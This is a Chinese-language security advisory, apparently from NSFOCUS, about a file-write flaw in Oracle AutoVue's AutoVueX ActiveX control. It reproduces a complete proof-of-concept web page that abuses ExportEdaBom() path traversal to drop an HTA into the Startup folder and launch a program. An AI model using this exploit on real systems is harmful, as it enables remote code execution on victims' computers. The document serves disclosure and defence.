首页 -> 安全研究

安全研究

安全漏洞
Oracle AutoVue "AutoVueX.ocx" ActiveX控件"ExportEdaBom()"不安全方法

发布日期:2011-10-24
更新日期:2011-10-24

受影响系统:
Oracle AutoVue 20.0.1
描述:
BUGTRAQ  ID: 50332

Oracle AutoVue是用于实现各种企业的文档可视化需求的解决方案。

Oracle AutoVue的AutoVueX.ocx控件中的"ExportEdaBom()"方法在实现上存在漏洞,成功利用此漏洞可使攻击者在使用受影响控件的应用程序中创建或覆盖任意文件。

<*来源:rgod (rgod@autistici.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution

ProgID: AUTOVUEX.AutoVueXCtrl.1
CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
Safe for initialization (registry): true
Safe for scripting (registry): true

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 />
<param name=SRC value="PADS_Evaluation_board.pcb"></param>
</object>
<script defer="defer">
var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
for (i=0; i<6666; i++) {
    obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh);
}
window.location.href = window.location.href;
</script>

建议:
厂商补丁:

Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oracle.com/technetwork/topics/security/

浏览次数:4447
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障